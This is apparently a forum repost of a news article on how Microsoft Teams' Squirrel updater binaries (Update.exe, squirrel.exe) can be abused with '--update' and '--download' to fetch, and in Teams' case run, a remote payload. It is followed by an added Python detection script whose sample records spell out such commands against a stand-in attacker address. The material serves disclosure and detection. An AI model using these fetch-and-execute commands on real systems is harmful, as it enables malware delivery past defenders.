Author Topic: Microsoft Teams Can Be Used to Download and Run Malicious Packages

Posted by javajolt (Administrator, windows10newsinfo.com)
The update mechanism as currently implemented in the Microsoft Teams desktop app allows an attacker to download and execute arbitrary files on the system.

The same issue affects the desktop software of GitHub, WhatsApp, and UiPath, but there it can be used only to download a payload, not to run it.

These applications rely on the open source Squirrel project to manage their installation and update routines; Squirrel uses the NuGet package format for releases, so an update is delivered to the client as a NuGet package.

Multiple security researchers found that running the updater's 'update' command against a vulnerable application executes an arbitrary binary in the context of the current user. The same applies to 'squirrel.exe'.

With Microsoft Teams, the payload is placed in the application's folder and executed automatically by either of the following commands:

    Update.exe --update [url to payload]

    squirrel.exe --update [url to payload]
Both binaries accept other arguments as well, including 'download', which retrieves the payload, in the form of a NuGet package, from a remote location:

    Update.exe --download [url to payload]

    squirrel.exe --download [url to payload]
The same method works with "squirrel.exe," which is also part of the Microsoft Teams installation package. Both executables are now listed in the Living Off The Land Binaries and Scripts (LOLBAS) project on GitHub.

Reverse engineer Reegun Richard tested the issue on Microsoft Teams and reported it to the company on June 4. The application remains vulnerable at the time of writing, as Microsoft informed the researcher that a fix would come in a future release of the software.

Attempts to replicate the effect with GitHub, WhatsApp, and UiPath did not achieve execution of the payload; only downloading it from a remote server was possible.

"In this scenario, an attacker can use this method to mask the payload download," which is still useful for an adversary, Richard told BleepingComputer.

Rooting for the blue team, Richard wanted to keep the details private until Microsoft released a patch.

Another researcher, playing for the red team, Mr. Un1k0d34 of the RingZer0 Team, had found the issue and published the details.



In a thread on Twitter, Richard explains how he found the bug and its root cause. He started from research published in late March by Hexacorn, which focused on living-off-the-land binaries (lolbins) in Electron-based apps.

Richard also made a video demonstrating how an attacker could use Microsoft Teams to get a shell on the target computer. Full details about exploiting this issue are available in a blog post from the researcher.



Microsoft Teams is intended for business use, as the successor to Skype for Business. It is an alternative to Slack and offers unified communications with video meetings, file storage, and collaboration features. It supports extensions for integration with products from other developers.

« Last Edit: June 29, 2019, 04:36:57 PM by javajolt »
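The article describes which switches of Update.exe and squirrel.exe fetch (and, for --update, run) a remote package. The following detection check is an added example written for this page; it is not code from the article, from Microsoft, or from the Squirrel project. It scans process-creation records for those two binaries invoked with --update or --download pointing at an http(s) URL, rating --update higher because the article reports that it also executes the package. The record layout (Image, CommandLine, ParentImage) follows Sysmon Event ID 1 field names, the records themselves are constructed for the example, and the allowlist host "updates.example.net" is a placeholder to be replaced with an organisation's own known update origins. The checker accepts both the space-separated spelling shown above and the `--switch=url` spelling.

```python
"""Added example (not from the article or the Squirrel project): flag
Update.exe / squirrel.exe invocations whose --update or --download argument
points at a remote URL, over constructed process-creation records.

Field names (Image, CommandLine, ParentImage) follow the Sysmon Event ID 1
layout; the records, hostnames and allowlist are constructed for the example.
"""
import re
from urllib.parse import urlparse

# Executables the LOLBAS entries describe; matched on lower-cased basename.
SQUIRREL_BINARIES = {"update.exe", "squirrel.exe"}

# Switches the article lists as fetching a package (--update also runs it).
FETCH_SWITCHES = {"--update", "--download"}

# ASSUMPTION for the example: hosts treated as legitimate update origins.
# "updates.example.net" is a placeholder; fill this from your own environment.
ALLOWED_UPDATE_HOSTS = {"updates.example.net"}

# Tokens are either a double-quoted run (paths with spaces) or non-whitespace.
_TOKEN = re.compile(r'"[^"]*"|\S+')


def _basename(path):
    """Last path component, lower-cased, tolerant of / or \\ separators."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def extract_fetch_url(command_line):
    """Return (switch, url) if the command line passes a value to --update or
    --download, in either 'switch url' or 'switch=url' form; otherwise None."""
    args = [t.strip('"') for t in _TOKEN.findall(command_line)]
    for i, arg in enumerate(args):
        lower = arg.lower()
        for switch in FETCH_SWITCHES:
            if lower == switch and i + 1 < len(args):
                return switch, args[i + 1]
            if lower.startswith(switch + "="):
                return switch, arg[len(switch) + 1:]
    return None


def classify(record):
    """Return a finding for a suspicious record, or None if it looks benign:
    not a Squirrel binary, no fetch switch, non-http(s) target, or an
    allowlisted host."""
    if _basename(record["Image"]) not in SQUIRREL_BINARIES:
        return None
    hit = extract_fetch_url(record["CommandLine"])
    if hit is None:
        return None
    switch, target = hit
    parsed = urlparse(target)
    if parsed.scheme.lower() not in ("http", "https"):
        return None  # local path or UNC share: out of scope for this check
    host = (parsed.hostname or "").lower()
    if host in ALLOWED_UPDATE_HOSTS:
        return None
    return {
        "image": _basename(record["Image"]),
        "switch": switch,
        "url": target,
        "host": host,
        "parent": _basename(record.get("ParentImage", "")),
        # --update fetches and runs the package; --download only stages it.
        "severity": "high" if switch == "--update" else "medium",
    }


def scan(records):
    """Run classify() over an iterable of records and keep the findings."""
    return [f for f in (classify(r) for r in records) if f is not None]


# Constructed sample records (not real telemetry); 203.0.113.10 is a
# documentation address standing in for an attacker-controlled server.
SAMPLE_RECORDS = [
    {"Image": r"C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe",
     "CommandLine": r'"C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe" --update http://203.0.113.10/pkg/',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Users\alice\AppData\Local\Microsoft\Teams\current\squirrel.exe",
     "CommandLine": r"squirrel.exe --download=https://203.0.113.10/pkg/",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"Image": r"C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe",
     "CommandLine": r"Update.exe --update=https://updates.example.net/teams/",
     "ParentImage": r"C:\Users\alice\AppData\Local\Microsoft\Teams\current\Teams.exe"},
    {"Image": r"C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe",
     "CommandLine": r"Update.exe --processStart Teams.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_RECORDS):
        print(finding)
```

Run against the constructed records, the first two (Update.exe --update from cmd.exe, squirrel.exe --download from powershell.exe, both to a non-allowlisted host) are reported, the allowlisted update and the --processStart launch are not. The check does not tell the host application apart, so for GitHub, WhatsApp or UiPath installs a hit on --update means a download was attempted rather than execution, per the article; the parent process and the target host are what an analyst would triage on.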